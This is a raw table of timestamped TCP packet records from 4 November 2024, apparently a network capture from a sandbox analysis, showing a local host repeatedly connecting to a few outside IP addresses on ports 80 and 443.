Nov 4, 2024 07:13:38.564960957 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.564987898 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.565355062 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.565366983 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.565376997 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.565388918 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.565398932 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.565409899 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.565412045 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.565429926 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.565454006 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.609694004 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.609714985 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.609724998 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.609771013 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.609807014 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.609854937 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.609865904 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.609878063 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.609889030 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.609904051 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.609919071 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.683062077 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.683079958 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.683134079 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.683137894 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.683150053 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.683161020 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.683171034 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.683171034 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.683198929 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.683221102 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.683532953 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.683566093 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.683576107 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.683577061 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.683598995 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.683608055 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.683856010 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.683867931 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.683876991 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.683901072 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.683902979 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.683913946 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.683926105 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.683948040 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.684412003 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.684422016 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.684431076 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.684457064 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.684479952 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.728226900 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.728238106 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.728247881 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.728291035 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.728317976 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.728341103 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.728404999 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.728415966 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.728446960 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.728672981 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.728683949 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.728693962 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.728718996 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.728729010 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.801723957 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.801737070 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.801753998 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.801772118 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.801791906 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.801796913 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.801808119 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.801832914 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.801868916 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:39.175734043 CET | 49804 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:39.182224989 CET | 80 | 49804 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:39.182293892 CET | 49804 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:39.182477951 CET | 49804 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:39.188903093 CET | 80 | 49804 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:40.020806074 CET | 80 | 49804 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:40.023854971 CET | 49804 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:40.031563997 CET | 80 | 49804 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:40.269002914 CET | 80 | 49804 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:40.417427063 CET | 49804 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:40.500725031 CET | 80 | 49804 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:40.500829935 CET | 49804 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:40.596412897 CET | 49811 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:40.596461058 CET | 443 | 49811 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:40.596519947 CET | 49811 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:40.609847069 CET | 49811 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:40.609877110 CET | 443 | 49811 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:41.228936911 CET | 443 | 49811 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:41.229016066 CET | 49811 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:41.234251022 CET | 49811 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:41.234261990 CET | 443 | 49811 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:41.234599113 CET | 443 | 49811 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:41.270083904 CET | 49811 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:41.311336040 CET | 443 | 49811 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:41.522629976 CET | 443 | 49811 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:41.522712946 CET | 443 | 49811 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:41.522943974 CET | 49811 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:41.527718067 CET | 49811 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:41.532917023 CET | 49804 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:41.537842035 CET | 80 | 49804 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:41.780272961 CET | 80 | 49804 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:41.782399893 CET | 49819 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:41.782440901 CET | 443 | 49819 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:41.782505989 CET | 49819 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:41.782759905 CET | 49819 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:41.782773972 CET | 443 | 49819 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:41.823378086 CET | 49804 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:42.386775017 CET | 443 | 49819 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:42.388278961 CET | 49819 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:42.388294935 CET | 443 | 49819 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:42.525620937 CET | 443 | 49819 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:42.525703907 CET | 443 | 49819 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:42.525748968 CET | 49819 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:42.526109934 CET | 49819 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:42.529591084 CET | 49804 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:42.530684948 CET | 49825 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:42.534692049 CET | 80 | 49804 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:42.534745932 CET | 49804 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:42.535444021 CET | 80 | 49825 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:42.535492897 CET | 49825 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:42.535563946 CET | 49825 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:42.536268950 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:42.536313057 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:42.540365934 CET | 80 | 49825 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:43.368520975 CET | 80 | 49825 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:43.369544029 CET | 49829 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:43.369569063 CET | 443 | 49829 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:43.369630098 CET | 49829 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:43.369842052 CET | 49829 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:43.369857073 CET | 443 | 49829 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:43.417133093 CET | 49825 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:43.986378908 CET | 443 | 49829 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:43.987953901 CET | 49829 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:43.987993002 CET | 443 | 49829 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:44.137142897 CET | 443 | 49829 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:44.137242079 CET | 443 | 49829 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:44.137330055 CET | 49829 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:44.137768984 CET | 49829 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:44.141850948 CET | 49834 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:44.146673918 CET | 80 | 49834 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:44.146784067 CET | 49834 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:44.146894932 CET | 49834 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:44.151639938 CET | 80 | 49834 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:44.988532066 CET | 80 | 49834 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:44.990812063 CET | 49840 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:44.990854979 CET | 443 | 49840 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:44.990921974 CET | 49840 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:44.991153002 CET | 49840 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:44.991163015 CET | 443 | 49840 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:45.042145967 CET | 49834 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:45.814275980 CET | 443 | 49840 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:45.815844059 CET | 49840 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:45.815865040 CET | 443 | 49840 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:45.954035044 CET | 443 | 49840 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:45.954139948 CET | 443 | 49840 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:45.954226971 CET | 49840 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:45.954560995 CET | 49840 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:45.957654953 CET | 49834 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:45.958647966 CET | 49846 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:45.962914944 CET | 80 | 49834 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:45.962982893 CET | 49834 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:45.963507891 CET | 80 | 49846 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:45.963571072 CET | 49846 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:45.963639021 CET | 49846 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:45.968791008 CET | 80 | 49846 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:46.798877001 CET | 80 | 49846 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:46.800069094 CET | 49852 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:46.800110102 CET | 443 | 49852 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:46.800168991 CET | 49852 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:46.800502062 CET | 49852 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:46.800517082 CET | 443 | 49852 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:46.838985920 CET | 49846 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:47.413868904 CET | 443 | 49852 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:47.415355921 CET | 49852 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:47.415384054 CET | 443 | 49852 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:47.555288076 CET | 443 | 49852 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:47.555392981 CET | 443 | 49852 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:47.555464983 CET | 49852 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:47.555799961 CET | 49852 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:47.559201002 CET | 49846 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:47.560134888 CET | 49858 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:47.564512014 CET | 80 | 49846 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:47.564574003 CET | 49846 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:47.564950943 CET | 80 | 49858 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:47.565109015 CET | 49858 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:47.565109015 CET | 49858 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:47.570159912 CET | 80 | 49858 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:48.409867048 CET | 80 | 49858 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:48.412636042 CET | 49864 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:48.412677050 CET | 443 | 49864 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:48.413290977 CET | 49864 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:48.413557053 CET | 49864 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:48.413572073 CET | 443 | 49864 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:48.463992119 CET | 49858 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:49.010987043 CET | 443 | 49864 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:49.021454096 CET | 49864 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:49.021483898 CET | 443 | 49864 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:49.154922962 CET | 443 | 49864 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:49.155015945 CET | 443 | 49864 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:49.155059099 CET | 49864 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:49.155561924 CET | 49864 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:49.158934116 CET | 49858 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:49.159987926 CET | 49870 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:49.164163113 CET | 80 | 49858 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:49.164211988 CET | 49858 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:49.164747000 CET | 80 | 49870 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:49.164797068 CET | 49870 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:49.164886951 CET | 49870 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:49.169598103 CET | 80 | 49870 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:50.006325960 CET | 80 | 49870 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:50.007395983 CET | 49876 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:50.007433891 CET | 443 | 49876 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:50.007966042 CET | 49876 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:50.008183002 CET | 49876 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:50.008198977 CET | 443 | 49876 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:50.057718992 CET | 49870 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:50.623040915 CET | 443 | 49876 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:50.624609947 CET | 49876 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:50.624622107 CET | 443 | 49876 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:50.768378973 CET | 443 | 49876 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:50.768470049 CET | 443 | 49876 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:50.768573999 CET | 49876 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:50.768923044 CET | 49876 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:50.772080898 CET | 49870 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:50.773164988 CET | 49882 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:50.777376890 CET | 80 | 49870 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:50.777441025 CET | 49870 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:50.777964115 CET | 80 | 49882 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:50.778034925 CET | 49882 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:50.779438019 CET | 49882 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:50.784198046 CET | 80 | 49882 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:51.623099089 CET | 80 | 49882 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:51.630346060 CET | 49887 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:51.630414963 CET | 443 | 49887 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:51.630496979 CET | 49887 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:51.630717993 CET | 49887 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:51.630733013 CET | 443 | 49887 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:51.667098999 CET | 49882 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:52.235079050 CET | 443 | 49887 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:52.239279032 CET | 49887 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:52.239382982 CET | 443 | 49887 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:52.375549078 CET | 443 | 49887 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:52.375657082 CET | 443 | 49887 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:52.375718117 CET | 49887 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:52.376208067 CET | 49887 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:52.378973007 CET | 49882 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:52.379472017 CET | 49889 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:52.384125948 CET | 80 | 49882 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:52.384197950 CET | 49882 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:52.384252071 CET | 80 | 49889 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:52.384432077 CET | 49889 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:52.384509087 CET | 49889 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:52.389270067 CET | 80 | 49889 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:53.210242987 CET | 80 | 49889 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:53.211431980 CET | 49895 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:53.211473942 CET | 443 | 49895 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:53.211541891 CET | 49895 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:53.211735010 CET | 49895 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:53.211745024 CET | 443 | 49895 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:53.260889053 CET | 49889 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:53.810508966 CET | 443 | 49895 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:53.812170982 CET | 49895 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:53.812216997 CET | 443 | 49895 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:53.949580908 CET | 443 | 49895 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:53.949709892 CET | 443 | 49895 | 188.114.96.3 | 192.168.2.5 |
Nov 4, 2024 07:13:53.949757099 CET | 49895 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:53.950110912 CET | 49895 | 443 | 192.168.2.5 | 188.114.96.3 |
Nov 4, 2024 07:13:53.971695900 CET | 49889 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:53.976820946 CET | 80 | 49889 | 193.122.6.168 | 192.168.2.5 |
Nov 4, 2024 07:13:53.976878881 CET | 49889 | 80 | 192.168.2.5 | 193.122.6.168 |
Nov 4, 2024 07:13:53.978713989 CET | 49901 | 443 | 192.168.2.5 | 149.154.167.220 |
Nov 4, 2024 07:13:53.978760004 CET | 443 | 49901 | 149.154.167.220 | 192.168.2.5 |
Nov 4, 2024 07:13:53.978820086 CET | 49901 | 443 | 192.168.2.5 | 149.154.167.220 |
Nov 4, 2024 07:13:53.979142904 CET | 49901 | 443 | 192.168.2.5 | 149.154.167.220 |
Nov 4, 2024 07:13:53.979161978 CET | 443 | 49901 | 149.154.167.220 | 192.168.2.5 |
Nov 4, 2024 07:13:54.815295935 CET | 443 | 49901 | 149.154.167.220 | 192.168.2.5 |
Nov 4, 2024 07:13:54.815397978 CET | 49901 | 443 | 192.168.2.5 | 149.154.167.220 |
Nov 4, 2024 07:13:54.817580938 CET | 49901 | 443 | 192.168.2.5 | 149.154.167.220 |
Nov 4, 2024 07:13:54.817610025 CET | 443 | 49901 | 149.154.167.220 | 192.168.2.5 |
